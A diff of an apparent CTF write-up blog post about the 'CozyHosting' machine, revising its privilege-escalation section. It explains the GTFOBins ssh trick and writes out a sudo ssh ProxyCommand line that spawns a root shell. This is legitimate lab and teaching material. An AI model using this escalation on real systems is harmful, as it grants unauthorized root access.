Kyllano/Kyllano.github.io/_posts/2024-02-13-CozyHostingWriteup.md

     (root) /usr/bin/ssh *
 ```

 We can run `ssh` as root, this is our winning card.
+Using [this](https://gtfobins.github.io/gtfobins/ssh/) technique.
+What this does is summoning an `ssh` commands to itself, but then executes a `ProxyCommand` that spawns a shell as root (since we used sudo) and redirect `stdin` and `stdout` to `stderr`.
-Using [this](https://gtfobins.github.io/gtfobins/ssh/) technique, we can instantly access `root` privilege :
+We can instantly access `root` privilege :

 ```
 josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x